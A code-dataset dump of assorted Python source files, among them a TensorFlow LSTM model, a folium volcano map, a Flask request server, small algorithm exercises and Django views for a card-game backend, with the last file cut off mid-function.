EXTRACTED_DIR / dir_).mkdir(\n parents=True, exist_ok=True\n )\n\n with exe_filename.open(\"rb\") as exe:\n asset_store = AssetStore.load_from_file(exe)\n unextracted = asset_store.extract(\n mods_dir / EXTRACTED_DIR,\n mods_dir / \".compressed\" / EXTRACTED_DIR,\n recompress=recompress,\n create_entity_sheets=create_entity_sheets,\n )\n\n for asset in unextracted:\n logger.warning(\"Un-extracted Asset %s\", asset.asset_block)\n\n dest = mods_dir / EXTRACTED_DIR / \"Spel2.exe\"\n if exe_filename != dest:\n logger.info(\"Backing up exe to %s\", dest)\n shutil.copy2(exe_filename, dest)\n\n logger.info(\"Extraction complete!\")\n","sub_path":"src/modlunky2/ui/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"339703926","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 
-*-\nimport numpy as np\nimport tensorflow as tf\nfrom six.moves import range\nfrom matplotlib import pyplot as plt\n\n\nclass RNN(object):\n\n def __init__(self, summary_frequency, num_nodes, num_layers, num_unrollings, n_future,\n batch_generator, input_shape=3, only_retrain_output=False, output_keep_prob=1,\n cell=tf.nn.rnn_cell.LSTMCell):\n \n self.batch_generator = batch_generator \n self.batch_size = self.batch_generator.batch_size\n self.num_unrollings = num_unrollings\n self.n_future = n_future\n self.num_nodes = num_nodes \n self.summary_frequency = summary_frequency\n self.input_shape = input_shape\n self.only_retrain_output = only_retrain_output\n self.output_keep_prob = output_keep_prob\n self.session=tf.Session()\n\n self.minibatch_loss_list = []\n self.loss_list = []\n self.val_loss_list = []\n \n self.is_training = True\n cells = [cell(self.num_nodes) for _ in range(num_layers)]\n \n if self.is_training:\n cells = [tf.nn.rnn_cell.DropoutWrapper(cell_, output_keep_prob = self.output_keep_prob)\n for cell_ in cells]\n\n \n # These layers are combined into a conventient MultiRNNCell object\n multi_cell = tf.nn.rnn_cell.MultiRNNCell(cells)\n\n # Read input data \n self.train_data = list()\n for _ in range(self.num_unrollings):\n self.train_data.append(\n tf.placeholder(tf.float32, shape=[None, self.input_shape]))\n\n self.train_labels = list()\n for _ in range(self.num_unrollings):\n self.train_labels.append(\n tf.placeholder(tf.float32, [None, 1]))\n \n \n # Feed the data to the RNN model\n outputs = tf.Variable(np.zeros([self.num_unrollings, self.batch_size, 1]))\n outputs, self.state = tf.nn.static_rnn(multi_cell, self.train_data, dtype=tf.float32)\n \n # Classifier. 
For training, we remove the last output, as it has no label.\n # The last output is only used for prediction purposes during sampling.\n self.w = tf.Variable(tf.truncated_normal([self.num_nodes, 1], -0.1, 0.1), name='output_w')\n self.b = tf.Variable(tf.zeros([1]), name='output_b')\n \n logits = tf.matmul(tf.concat(axis=0,values=outputs), self.w) + self.b \n \n logits = tf.reshape(logits, [self.num_unrollings, -1, 1])\n #self.train_labels = tf.concat(axis=0,values=self.train_labels)\n #self.train_labels = tf.reshape(self.train_labels, [self.batch_size, 1, self.num_unrollings])\n\n self.sample_prediction = logits \n\n \n self.loss = tf.losses.mean_squared_error(self.train_labels, logits)\n #self.loss = self.loss = tf.reduce_mean(\n # tf.nn.softmax_cross_entropy_with_logits(\n # logits=logits, labels=self.train_labels))\n \n # Optimizer.\n if self.only_retrain_output:\n self.optimizer = tf.train.AdamOptimizer().minimize(loss=self.loss, var_list=[self.w, self.b])\n else: \n self.optimizer = tf.train.AdamOptimizer().minimize(self.loss)\n\n\n # Train prediction. 
We keep this to keep track of the model's progress.\n self.train_prediction = logits\n self.session=tf.Session()\n with self.session.as_default():\n init_op = tf.global_variables_initializer()\n self.session.run(init_op)\n \n\n\n def train(self, num_steps):\n \n self.is_training = True\n\n with self.session.as_default():\n\n mean_loss=0\n\n for step in range(num_steps):\n\n feed_dict = dict()\n \n x_batch, y_batch = self.batch_generator.next_batch('train')\n #y_batch = y_batch.reshape([self.batch_generator.batch_size, self.num_unrollings, 1])\n for i in range(self.num_unrollings): \n \n feed_dict[self.train_data[i]] = x_batch[:,:,i] \n feed_dict[self.train_labels[i]] = y_batch[:,:,i]\n \n \n _, l, predictions, = self.session.run(\n [self.optimizer, self.loss, self.train_prediction], feed_dict=feed_dict)\n\n mean_loss += l\n\n if step % self.summary_frequency == 0:\n\n if step > 0:\n mean_loss = mean_loss / self.summary_frequency\n self.loss_list.append(mean_loss)\n val_loss = self.get_val_loss()\n self.val_loss_list.append(val_loss)\n\n # The mean loss is an estimate of the loss over the last few batches.\n print(' Average train loss at step %d: %f ' % (step, mean_loss))\n print('Average val loss at step %d: %f ' % (step, val_loss))\n\n mean_loss=0\n\n\n def return_output_weights(self):\n\n feed_dict=dict()\n x_batch, y_batch = self.batch_generator._next()\n for i in range(self.num_unrollings + 1):\n feed_dict[self.train_data[i]] = x_batch[i]\n\n return self.session.run([self.w], feed_dict=feed_dict)[-1]\n\n\n def create_restore_dict(self):\n\n variable_names = [v for v in tf.trainable_variables()]\n variable_handles = [v.name for v in variable_names]\n restore_dict = dict(zip(variable_handles, variable_names))\n restore_dict.pop('Variable:0')\n restore_dict.pop('output_w:0')\n restore_dict.pop('output_b:0')\n\n return restore_dict\n\n\n def save(self, checkpointname, full_model=True):\n\n self.saver = tf.train.Saver()\n if full_model == False:\n restore_dict = 
self.create_restore_dict()\n with self.session.as_default():\n self.saver = tf.train.Saver(restore_dict)\n\n self.saver.save(self.session, checkpointname)\n print('Model saved')\n\n\n def load(self, checkpointname, full_model=True):\n\n self.saver = tf.train.Saver()\n if full_model == False:\n restore_dict = self.create_restore_dict()\n with self.session.as_default():\n self.saver = tf.train.Saver(restore_dict)\n\n self.saver.restore(self.session, checkpointname)\n print('Model restored')\n\n\n def predict(self, inputs):\n\n self.is_training = False\n \n feed_dict = dict()\n for i in range(self.num_unrollings):\n feed_dict[self.train_data[i]] = inputs[:,:,i] \n predictions, = self.session.run(\n [self.sample_prediction], feed_dict=feed_dict)\n \n return predictions\n\n\n def get_val_loss(self):\n \n x_val, y_val = self.batch_generator.next_batch('test')\n \n feed_dict = dict()\n labels = list()\n \n for i in range(self.num_unrollings):\n feed_dict[self.train_data[i]] = x_val[:,:,i] \n labels.append(y_val[:,:,i])\n \n pred, = self.session.run(\n [self.sample_prediction], feed_dict=feed_dict)\n \n labels = np.array(labels)\n \n return np.mean(np.square(labels-pred))\n \n\n def plot_loss(self):\n\n x1=np.array(self.loss_list)\n x2=np.array(self.val_loss_list)\n plt.plot(x1,color='g',alpha=0.4, linewidth=5)\n plt.plot(x2,color='r',alpha=0.4, linewidth=5)\n plt.xlabel('Iterations')\n plt.legend(['train_loss', 'val_loss'])\n plt.show()\n\nif __name__ == '__main__':\n \n from batch_generator import BatchGenerator\n train_dir = '/media/sander/samsungssd/tradosaurus/train_data/'\n test_dir = '/media/sander/samsungssd/tradosaurus/test_data/'\n batch_size = 32\n n_future = 1\n generator = BatchGenerator(train_dir, test_dir, batch_size, n_future)\n\n \n summary_frequency=10\n num_nodes=16\n num_layers=3\n num_unrollings = 100-n_future\n batch_generator=generator \n input_shape = 3\n only_retrain_output=False\n output_keep_prob = 1\n cell=tf.nn.rnn_cell.LSTMCell\n \n nn = 
RNN(summary_frequency, num_nodes, num_layers, num_unrollings, n_future,\n batch_generator, input_shape, only_retrain_output, output_keep_prob,\n cell)\n nn.train(5000)\n nn.plot()\n \n x, y = generator.next_batch('train')\n x, y = x[0], y[0]\n y = y.reshape([100-n_future, 1])\n x = x.reshape([1, 3, 100-n_future])\n \n plt.plot(x[0,0,:])\n plt.plot(y)\n \n pred = nn.predict(x)\n \n #pred_plot = np.concatenate([np.zeros(n_future).reshape([n_future,1]), predictions])\n \n plt.scatter(pred, y)\n \n plt.plot(x[0,0,:], color='g', alpha=.4)\n plt.plot(y, color='r', alpha=.4)\n plt.plot(pred, color='b', alpha=.4)","sub_path":"rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":9108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"574475412","text":"import folium\r\nimport pandas as pd\r\n\r\ndf1 = pd.read_csv(\"Volcanoes_USA.txt\")\r\n#from geopy.geocoders import Nominatim\r\n#gv3 = Nominatim(user_agent=\"my-application\", scheme = \"https\")\r\n#df1['Coordinates'] = df1.Lat + df1.Lon\r\n#df['Pos'] = df1.Coordinates.apply(gv3.geocode)\r\n\r\nlat = list(df1.LAT)\r\nlon = list(df1.LON)\r\nelev = list(df1.ELEV)\r\nnme = list(df1.NAME)\r\n\r\ndef det_cr(elev):\r\n if elev in range(0,1000):\r\n return 'green'\r\n elif elev in range(1000,3000):\r\n return 'orange'\r\n else:\r\n return 'red'\r\n\r\nmap = folium.Map(location=[38.58, -90.09], tiles='Mapbox Bright', zoom_start=12)\r\nfg = folium.FeatureGroup(name=\"Volcanoes\")\r\n\r\nfor i,j,k,l in zip(lat,lon,nme,elev):\r\n fg.add_child(folium.CircleMarker(location=[i,j], radius=6, popup=folium.Popup(k, parse_html=True), \r\n fill_color=det_cr(l), color='grey', fill_opacity=0.7))\r\n# fg.add_child(folium.CircleMarker(location=[i,j], popup=folium.Popup(k, parse_html=True), tooltip=folium.Icon(color=det_cr(l))))\r\n\r\nfp = folium.FeatureGroup(name=\"Population\")\r\n \r\nfp.add_child(folium.GeoJson(data=open('world.json','r', encoding = 
'utf-8-sig').read(),\r\nstyle_function=lambda x: {'fillColor':'green' if x['properties']['POP2005'] < 10000000 \r\nelse 'orange' if 10000000 <= x['properties']['POP2005'] < 20000000 else 'red'}))\r\n \r\nmap.add_child(fg)\r\nmap.add_child(fp)\r\nmap.add_child(folium.LayerControl())\r\nmap.save(\"webmap.html\")","sub_path":"Webmap.py","file_name":"Webmap.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"3112317","text":"from flask import Flask, make_response, request, render_template, send_file, abort, jsonify, send_from_directory\nfrom flask import Response\nimport io\nimport csv\nimport os\nfrom flask_cors import CORS, cross_origin\n\napp = Flask(__name__, static_url_path='')\nCORS(app, support_credentials=True)\n\n@app.route('//', methods=[\"GET\",\"POST\"])\n@cross_origin(supports_credentials=True)\ndef root(path, reqid):\n print('sending ' + path) \n return app.send_static_file(reqid + '/' + path)\n\n# # Let us see which works\n# @app.route('/results//')\n# #@app.route('/results//')\n# def send_js(path,reqid):\n# return send_from_directory('results/'+reqid, path)\n\n@app.route(\"/\")\ndef hello():\n return render_template(\"main_page.html\")\n\n# Dummy form to get information \n\n#@app.route('/transform', methods=[\"GET\",\"POST\"])\n# def transform_view():\n# #userid = request.form[\"userid\"]\n# userid = request.args.get('userid')\n# print(userid)\n# return userid\n\n# Getting a Post Request from the user to store queries in todo list\n@app.route('/add_request', methods=[\"GET\",\"POST\"]) #GET requests will be blocked\n@cross_origin(supports_credentials=True)\ndef read_request():\n req_data = request.get_json()\n user_id = str(req_data['user_id'])\n query = str(req_data['query'])\n \n with open('id_counter.csv', mode='r') as infile:\n # id_counter format - user_id : id_counter\n reader = csv.reader(infile) \n id_counter_dict = {rows[0]:rows[1] for rows in 
reader}\n print(id_counter_dict)\n if user_id in id_counter_dict:\n print('here')\n print( id_counter_dict[user_id] )\n id_counter_dict[user_id] = str(int(id_counter_dict[user_id]) + 1)\n id_counter = int(id_counter_dict[user_id])\n else:\n print('here2')\n #print( id_counter_dict[user_id] )\n id_counter_dict[user_id] = 0\n id_counter = 0\n with open('id_counter.csv', 'w') as fw:\n for key in id_counter_dict.keys():\n fw.write(\"%s,%s\\n\"%(key,id_counter_dict[key]))\n\n\n #req_id = user_id + '_' + str(req_data['req_id']) \n req_id = user_id + '_' + str(id_counter)\n source = str(req_data['type'])\n mode = str(req_data['mode'])\n\n \n\n ######## Youtube translation to backend format\n if source == 'Youtube':\n if mode == 'audio':\n source_mode = source + '_0'\n else:\n source_mode = source + '_1'\n \n ######## Wikitravel translatio to backend format\n if source == 'Wikitravel':\n source_mode = source + '_' + mode\n \n \n line = [user_id, req_id, source_mode, query]\n print('Writing this to todo.csv')\n print(line) \n with open('todo.csv', 'a', newline='') as fw:\n writer = csv.writer(fw, delimiter=',')\n writer.writerow(line)\n print(\"Stored in todo\")\n req_data['server_request_id'] = req_id\n print(type(req_data))\n return jsonify(req_data)\n\n\n\n@app.route('/send_results', methods=[\"GET\",\"POST\"])\n@cross_origin(supports_credentials=True)\ndef transform_view():\n req_data=request.get_json()\n user_id = str(req_data['user_id'])\n\n \n req_id= str(req_data['server_request_id'])\n req_id_original = str(req_data['server_request_id'])\n #req_id = user_id + '_' + str(req_data['req_id'])\n if req_data['query'] == 'Valparaiso':\n req_id = 'w_0' \n if req_data['query'] == 'Hyderabad':\n req_id = 'w_1'\n if req_data['query'] == 'Gaand':\n req_id = 'yt_1'\n UPLOAD_DIRECTORY = 'static/'+req_id\n print('looking for your request in the following directory')\n print(UPLOAD_DIRECTORY)\n if not os.path.exists(UPLOAD_DIRECTORY):\n # Create response\n message = 
{\"server_request_id\":req_id_original,\"status\":\"Downloading\"}\n #return Response(jsonify(message), status=200, mimetype='application/json')\n return jsonify(message), 200\n #return \"Wait till you get it!\"\n else: \n files = []\n path = 'static/' + str(req_id) + '/'\n print(path)\n #ip_address = '192.168.43.31' \n import socket \n hostname = socket.gethostname() \n IPAddr = socket.gethostbyname(hostname)\n print('IP Address :')\n print(IPAddr) \n for i in os.listdir(path):\n files.append(i) \n\n # Weirdly the following line is giving 127.0.0.1 as ip address for alfredo \n #full_path_array = ['http://' + IPAddr + ':5000/' + str(req_id) + '/' + s for s in files]\n full_path_array = [str(req_id) + '/' + s for s in files]\n response_frontend = {}\n response_frontend['status'] = \"OK\"\n response_frontend['links'] = full_path_array\n response_frontend['server_request_id'] = req_id_original\n \n # Add the server address (MAKE IT AGNOSTIC OF IP ADDRESS)\n return jsonify(response_frontend)\n\n@app.route('/backup/', methods=[\"GET\",\"POST\"])\n@cross_origin(supports_credentials=True)\ndef give_backup(userid):\n req_data=request.get_json()\n directory_to_look = 'static/backup/' + userid + '.json'\n import json\n if request.method == 'GET':\n with open(directory_to_look, 'r', encoding='utf-8') as f:\n json_data = json.load(f)\n return (jsonify(json_data))\n if request.method == 'POST':\n print()\n with open(directory_to_look, 'w+', encoding='utf-8') as f:\n json.dump(req_data, f)\n message = {\"status\":\"OK\"}\n return jsonify(message), 200\n \n \n\n\n\n\nif __name__ == \"__main__\":\n app.run(host= '0.0.0.0', ssl_context='adhoc')","sub_path":"server_final.py","file_name":"server_final.py","file_ext":"py","file_size_in_byte":5608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"621621184","text":"# Autor: Bruno Omar Jiménez Mancilla A01748931\n# Descripcion: Un programa que calcule IVA, propina y el total de una 
comida\n\n# Escribe tu programa después de esta línea.\nc=float(input(\"Ingresa el total de tu comida: \"))\np=c*.13\ni=c*.16\nt=c+p+i\nstr(print(\"Costo de su comida: $\",round(c,2),\n \"Propina: $\",round(p,2),\n \"IVA: $\",round(i,2),\n \"Total a pagar: $\",round(t,2),))\n","sub_path":"cuenta.py","file_name":"cuenta.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"216621644","text":"from flask import *\nfrom scrapper import Scrapper\n\napp = Flask(__name__)\n\n@app.route('/aule', methods=['GET'])\ndef aule():\n aula = request.args.get('aula')\n settimanaDopo = request.args.get('settimanaDopo')\n\n # Conversione da string a boolean\n if settimanaDopo == 'True':\n settimanaDopo = True\n else:\n settimanaDopo = False\n scrapper = Scrapper()\n dati = scrapper.cerca_orario_aule(aula, settimanaDopo)\n if dati is None:\n return \"SETTIMANA DI VACANZA\"\n ris = \"Aula \" + aula + \"
\"\n for giorni in dati:\n for giorno in giorni.values():\n if isinstance(giorno, str):\n ris += giorno + \" \"\n else:\n for materie in giorno:\n for materia in materie.values():\n if isinstance(materia, str):\n ris += materia + \" \"\n else:\n for classe in materia:\n ris += classe + \" \"\n ris += \"
\"\n ris += \"
\"\n return ris\n\n","sub_path":"Selenium/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"644712157","text":"\n# title\n# find all unique quadruplets\n\nnums = [int(x) for x in input().split()]\ntarget = input()\n\n# \"1 0 -1 0 -2 2\"\n# 0\n\n# -2 -1 0 0 1 2 \ndef solve(nums, target):\n res = set()\n hmap = {}\n for i in range(len(nums)):\n for j in range(i+1, len(nums)):\n _sum = nums[i] + nums[j]\n if _sum in hmap:\n for pair in hmap[_sum]:\n if i not in pair and j not in pair:\n res.add(tuple(sorted([nums[i], nums[j], nums[pair[0]], nums[pair[1]]])))\n if target - _sum not in hmap:\n hmap[target - _sum] = set()\n hmap[target - _sum].add((i, j))\n \n return map(list, res)\n \n \nprint(solve(nums, target))","sub_path":"leetcode/4sum.py","file_name":"4sum.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"328200753","text":"import copy\n\ndef compute_shipment(shipment, warehouses):\n min_list = warehouses + warehouses\n for i in range(0, len(warehouses)):\n ship_copy = copy.deepcopy(shipment)\n list = []\n res = recursive_helper(ship_copy, i, list, warehouses)\n if len(res) < len(min_list):\n min_list = res\n if len(min_list) > len(warehouses):\n return []\n return min_list\n\n\n\"\"\" this function recursively backtracks through all combinations of warehouses starting from a given index\"\"\"\ndef recursive_helper(shipment, idx, list, warehouses):\n #if you have reached the end of the list of warehouses and not fulfilled order, break recursion with a list that is impossible to reach\n if idx == len(warehouses) and len(shipment) > 0:\n return warehouses + warehouses #not possible to reach this answer, the correct answer is guaranteed to be shorter\n #if you have fulfilled the shipment, then return the list of warehouses\n elif len(shipment) == 
0:\n return list\n #else subtract the inventory of the warehouse at current index, add that warehouse to list, and recursively repeat from idx+1 to len(warehouses)\n else:\n #subtract inventory of current warehouse from the shipment\n warehouse = warehouses[idx]\n dict = {} #key: item, val: amount taken from warehouse\n rmv_key_list = [] # list of keys to remove form shipment\n for itm in shipment.keys():\n amount = get_warehouse_amt(warehouse, itm)\n if amount >= shipment[itm]:\n dict[itm] = shipment[itm]\n rmv_key_list.append(itm)\n else:\n dict[itm] = amount\n old = shipment[itm]\n shipment[itm] = old - amount\n #remove any items from shipment that are totally fulfilled\n for k in rmv_key_list:\n del shipment[k]\n #add the current warehouse to list\n list_dict = {}\n list_dict[warehouse['name']] = dict\n list.append(list_dict)\n #now recursively get shortest list\n min_list = warehouses + warehouses\n for i in range(idx+1, len(warehouses)+1):\n shipment_copy = copy.deepcopy(shipment)\n list_copy = copy.deepcopy(list)\n res = recursive_helper(shipment_copy, i, list_copy, warehouses)\n if len(res) < len(min_list):\n min_list = res\n\n return min_list\n\n\n#small helper function for indexing nested dicts\ndef get_warehouse_amt(warehouse, item):\n itm_dict = warehouse['inventory']\n if item in itm_dict.keys():\n return itm_dict[item]\n else:\n return 0\n","sub_path":"src/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"30759980","text":"'''A module to run unit tests.'''\n\nimport unittest\n\ndef _run_tests():\n test_suite = unittest.TestLoader().discover(\n start_dir='.', pattern='*_test.py', top_level_dir='.')\n\n unittest.TextTestRunner(verbosity=2).run(test_suite)\n\nif __name__ == \"__main__\":\n 
_run_tests()\n","sub_path":"run_unit_tests.py","file_name":"run_unit_tests.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"610449910","text":"import os\nimport time\nimport asyncio\nimport websockets\nfrom queue import Queue\nfrom django.utils import timezone\nfrom django.core.management.base import BaseCommand\nfrom html_parser.websocket import check_updates\nfrom html_parser.worker import Worker\nfrom html_parser.models import UserTask\nfrom threading import Thread\n\n\ndef web(port):\n # worst method ever\n os.system('python manage.py runserver 0.0.0.0:{} --insecure'.format(port))\n\n\nclass Command(BaseCommand):\n help = 'Запустить парсер отдельной командой'\n\n def add_arguments(self, parser):\n # Positional arguments\n parser.add_argument('port', nargs='+', type=int)\n\n # Named (optional) arguments\n parser.add_argument(\n '--port',\n action='store_true',\n dest='delete',\n help='Add port to run django app',\n )\n\n def handle(self, *args, **options):\n\n port = options['port'][0]\n\n parser_thread = Thread(target=web, args=(port,))\n\n # run websocket in second thread; able to set port via params\n start_server = websockets.serve(check_updates, \"localhost\", 9999)\n global_timeout = 2\n asyncio.get_event_loop().run_until_complete(start_server)\n Thread(target=asyncio.get_event_loop().run_forever).start()\n\n try:\n parser_thread.start()\n work_queue = Queue()\n html_parser = Worker(work_queue, global_timeout)\n html_parser.start()\n\n # Другим потоком накидываю задания в очередь\n while True:\n\n now = timezone.now()\n for task in UserTask.objects.filter(status='0', date__lte=now):\n work_queue.put(task)\n\n time.sleep(global_timeout * 3)\n\n except KeyboardInterrupt:\n # hard close application\n 
os._exit(0)\n","sub_path":"html_parser/management/commands/run_parser.py","file_name":"run_parser.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"537170431","text":"# -*- coding: utf-8 -*\nimport os\nimport requests\nfrom lxml import etree\nfrom threading import Thread\nfrom Queue import Queue\n\npath = '/opt/data'\nurl = 'https://swfdev.com/'\nfiles = [os.path.join(path, f) for f in os.listdir(path) if f.endswith('.xml')]\n\n\nclass TThread(Thread):\n def __init__(self, queue, file):\n self.queue = queue\n self.file = file\n Thread.__init__(self)\n\n def run(self):\n self.send_pos()\n\n self.queue.task_done()\n\n def parsing(self, file):\n d, l = {}, []\n context = etree.iterparse(file, tag='node')\n for action, elem in context:\n values = elem.xpath('value[@genre=\"user\"]')\n e = {v.get('label'): v.text for v in values}\n e['node_id'] = elem.get('id')\n l.append(e)\n d['node'] = l\n d['gateway_id'] = context.root.get('gateway_id')\n return d\n\n def send_pos(self):\n values = {'data': self.parsing(self.file)}\n requests.post(url, data=values)\n\nqueue = Queue()\n\nfor f in files:\n t = TThread(queue, f)\n queue.put(t)\n t.start()\n\nqueue.join()\n","sub_path":"main/threading/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"449754909","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom models import XPlayer, Mute, FriendsList, Feedback, CloudPlayerIds, Version, XLog\nimport json\n# Create your views here.\n\n\n\ndef index(request):\n return HttpResponse(\"1\")\n\ndef example2(request):\n return HttpResponse(\"2\")\n\ndef snia(request):\n userId = request.GET.get(\"userId\", \"definetelysomethingthatdoesntexist\")\n newEmail = request.GET.get(\"newEmail\", \"\")\n dddUser = 
XPlayer.objects.filter(objectId = userId)\n\n if len(dddUser) == 0:\n return HttpResponse(\"-1\")\n else:\n dddUser[0].emailVerified = newEmail\n dddUser[0].save()\n return HttpResponse(\"snia: \" + dddUser[0].emailVerified)\n\n#http://127.0.0.1:8000/x/createUser/?username=dimitris&facebookId=23423423423124123&isMale=1\ndef createUser(request):\n username = request.GET.get(\"username\", \"\")\n facebokId = request.GET.get(\"facebookId\", \"\")\n isMale = request.GET.get(\"isMale\", \"1\")\n if (isMale == \"1\"):\n isMale = True\n else:\n isMale = False\n users = XPlayer.objects.filter(fbId = facebokId)\n newLog = XLog(userId=facebokId, action=1)\n newLog.save()\n if len(users) == 0:\n newUser = XPlayer(fbId = facebokId, pUsername = username, isMale=isMale)\n newUser.save()\n newLog = XLog(userId = facebokId, action = 2)\n newLog.save()\n return HttpResponse(convertToJson(newUser), content_type='application/json')\n else:\n return HttpResponse(convertToJson(users[0]), content_type='application/json')\n\n\ndef createCloudId(request):\n cloudId = request.GET.get(\"cloudId\", \"\")\n facebookId = request.GET.get(\"facebookId\", \"\")\n users = CloudPlayerIds.objects.filter(cloudId =cloudId, facebookId = facebookId)\n newLog = XLog(userId=facebookId, action=3)\n newLog.save()\n if len(users) == 0:\n newUser = CloudPlayerIds(facebookId = facebookId, cloudId = cloudId)\n newUser.save()\n return HttpResponse(\"1\")\n else:\n return HttpResponse(\"1\")\n\ndef addversion(request):\n version = request.GET.get(\"version\", \"\")\n newVersion = Version(version = version)\n newVersion.save()\n return HttpResponse()\n\ndef version(request):\n # obj = Version.objects.all()\n # version = obj[len(obj) - 1].version\n version = Version.objects.all().order_by(\"-createdAt\")[0].version\n return HttpResponse(version)\n\ndef feedback(request):\n facebookId_ = request.GET.get(\"fbId\", \"\")\n text_ = request.GET.get(\"text\", \"\")\n users = Feedback(facebookId = facebookId_)\n 
users.text = text_\n users.save()\n newLog = XLog(userId=facebookId_, action=4)\n newLog.save()\n return HttpResponse(\"1\")\n\ndef addFriend(request):\n user = request.GET.get(\"user\", \"\")\n friend = request.GET.get(\"friend\", \"\")\n users = FriendsList.objects.filter(fbId = user, friend = friend)\n newLog = XLog(userId = user, action=5)\n newLog.save()\n if len(users) == 0:\n newFriend = FriendsList(fbId=user, friend=friend)\n newFriend.save()\n return HttpResponse(\"1\")\n else:\n return HttpResponse(\"1\")\n\ndef addMute(request):\n reporter = request.GET.get(\"reporter\",\"\")\n user = request.GET.get(\"user\", \"\")\n users = Mute.objects.filter(reporter = reporter, user = user)\n newLog = XLog(userId = reporter, action=6)\n newLog.save()\n if len(users) == 0:\n newReport = Mute(reporter = reporter, user = user)\n newReport.save()\n return HttpResponse(\"1\")\n else:\n return HttpResponse(\"1\")\n\n\ndef userId(request):\n userId = request.GET.get(\"userId\", \"\")\n user = XPlayer.objects.filter(fbId = userId)\n newLog = XLog(userId=userId, action=7)\n newLog.save()\n if len(user) == 0:\n return HttpResponse(-1)\n else:\n return HttpResponse(convertToJson(user[0]), content_type='application/json')\n\ndef convertToJson(user):\n return json.dumps({\n \"pUsername\": user.pUsername,\n \"isMale\": user.isMale,\n \"facebookId\": user.fbId,\n \"objectId\": user.objectId,\n \"totalGamesXeri\": user.totalGamesXeri,\n \"xeri\": user.xeri,\n \"plakoto\": user.plakoto,\n \"emailVerified\": user.emailVerified,\n \"totalGamesPlakoto\": user.totalGamesPlakoto,\n \"words\": user.words,\n \"totalGamesWords\": user.totalGamesWords,\n \"updatedAt\": str(user.updatedAt),\n \"authData\": user.authData,\n \"scoreFour\": user.scoreFour,\n \"totalGamesScoreFour\": user.totalGamesScoreFour,\n \"totalGamesAgonia\": user.totalGamesAgonia,\n \"agonia\": user.agonia,\n \"griniaris\": user.griniaris,\n \"totalGamesGriniaris\": user.totalGamesGriniaris\n })\n\ndef friends(request):\n 
userId = request.GET.get(\"userId\", \"\")\n friends = FriendsList.objects.filter(fbId = userId).values_list('friend')\n newLog = XLog(userId = userId, action=8)\n newLog.save()\n if len(friends) == 0:\n return HttpResponse(\"[]\")\n\n else:\n friendStr = \"[\"\n for i in range(0,len(friends)):\n friendId = XPlayer.objects.filter(fbId = str(friends[i][0]))\n friendStr = friendStr + convertToJson(friendId[0]) + \",\"\n friendStr = friendStr[:-1] + \"]\"\n return HttpResponse(friendStr, content_type = 'application/json')\n\ndef friendMe(request):\n userId = request.GET.get(\"userId\", \"\")\n userFriends = FriendsList.objects.filter(friend = userId).values_list('fbId')\n newLog = XLog(userId = userId, action=9)\n newLog.save()\n if len(userFriends) == 0:\n return HttpResponse(\"[]\")\n else:\n friendStr = \"[\"\n for i in range(0,len(userFriends)):\n friendId = XPlayer.objects.filter(fbId = str(userFriends[i][0]))\n friendStr = friendStr + convertToJson(friendId[0]) + \",\"\n friendStr = friendStr[:-1] + \"]\"\n return HttpResponse(friendStr, content_type = 'application/json')\n\ndef mutes(request):\n userId = request.GET.get(\"userId\", \"\")\n muted = Mute.objects.filter(reporter = userId).values_list('user')\n newLog = XLog(userId=userId, action=10)\n newLog.save()\n if len(muted) == 0:\n return HttpResponse(\"[]\")\n else:\n MuteStr = \"[\"\n for i in range(0, len(muted)):\n mutedId = XPlayer.objects.filter(fbId = str(muted[i][0]))\n MuteStr = MuteStr + convertToJson(mutedId[0]) + \",\"\n\n MuteStr = MuteStr[:-1] + \"]\"\n return HttpResponse(MuteStr, content_type = 'application/json')\n\ndef mutedMe(request):\n userId = request.GET.get(\"userId\", \"\")\n reporters = Mute.objects.filter(user = userId).values_list('reporter')\n newLog = XLog(userId=userId, action=11)\n newLog.save()\n if len(reporters) == 0:\n return HttpResponse(\"[]\")\n else:\n reportersStr = \"[\"\n for i in range(0,len(reporters)):\n reporter = XPlayer.objects.filter(fbId = 
str(reporters[i][0]))\n reportersStr = reportersStr + convertToJson(reporter[0]) + \",\"\n reportersStr = reportersStr[:-1] + \"]\"\n return HttpResponse(reportersStr, content_type = 'application/json')\n\ndef unfriend(request):\n userId = request.GET.get(\"userId\",\"\")\n friendId = request.GET.get(\"friend\", \"\")\n friends = FriendsList.objects.filter(fbId = userId, friend = friendId)\n newLog = XLog(userId=userId, action=12)\n newLog.save()\n if len(friends) == 0:\n return HttpResponse(\"1\")\n else:\n friends.delete()\n return HttpResponse(\"1\")\n\ndef unmute(request):\n reporterId = request.GET.get(\"reporterId\", \"\")\n userId = request.GET.get(\"userId\",\"\")\n unMute = Mute.objects.filter(reporter = reporterId, user = userId)\n newLog = XLog(userId=reporterId, action=13)\n newLog.save()\n if len(unMute) == 0:\n return HttpResponse(\"1\")\n else:\n unMute.delete()\n return HttpResponse(\"1\")\n\ndef cloudId(request):\n userId = request.GET.get(\"userId\", \"\")\n cloudUser = CloudPlayerIds.objects.filter(facebookId 